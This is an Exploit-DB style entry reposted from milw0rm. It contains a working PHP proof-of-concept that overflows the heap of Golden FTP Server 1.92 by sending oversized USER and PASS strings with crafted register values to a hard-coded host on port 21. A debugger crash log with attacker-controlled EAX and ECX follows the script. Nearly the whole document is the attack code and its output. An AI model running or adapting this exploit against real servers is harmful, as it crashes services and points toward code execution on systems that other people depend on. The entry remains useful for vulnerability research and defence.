Golden FTP server 1.92 - 'USER/PASS' Heap Overflow (PoC)
Author: rgod
type: dos
platform: windows
port:
date_added: 2006-12-10
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comGolden_FTP_Server_Pro_v1.92.zip
<?php
#23.07 03/12/2006
#Golden FTP server 1.92 (freeware edition) USER/PASS heap based overflow poc
#by rgod retrog at alice dot it
#site: http://retrogod.altervista.org
#download link: http://www.download.com/3000-2160_4-10375602.html?tag=sd.EXAF
$host="192.168.1.3";
$port="21";
$junk="";
for ($i=1; $i<=8095; $i++){
$junk.="a";
}
$eax="AAAA";
$eax[0]=chr(ord($eax)-20); //to have the wanted eax
$ecx="BBBB";
$junk.=$ecx.$eax;
$sock=@fsockopen($host,$port,$errno, $errstr, 10);
if (!$sock){
die("\nnot connected!\n");
}
else {
fgets($sock,80);
fputs($sock,"USER ".$junk."\r\n");
fgets($sock,80);
fputs($sock,"PASS ".$junk."\r\n");
fclose($sock);
}
/*
...
17:07:28.144 pid=0870 tid=1128 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
----------------------------------------------------------------
EAX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=00EBFD64: C4 9D A6 00 F4 BF A5 00-00 9F A6 00 BC FD EB 00
ESP=00EBFD1C: 00 00 00 00 58 FD EB 00-61 24 41 00 80 9F A6 00
EBP=00EBFD20: 58 FD EB 00 61 24 41 00-80 9F A6 00 F4 BF A5 00
ESI=004B9F04: 2D 41 41 41 00 00 00 00-00 00 00 00 00 00 00 00
EDI=004B9F00: 42 42 42 42 2D 41 41 41-00 00 00 00 00 00 00 00
EIP=004A9B74: 8B 00 8B 12 E8 5F F6 FD-FF 0F 94 C0 83 E0 01 5B
--> MOV EAX,[EAX]
----------------------------------------------------------------
17:07:28.254 pid=0870 tid=1128 Thread exited with code 0
...
*/
?>
# milw0rm.com [2006-12-11]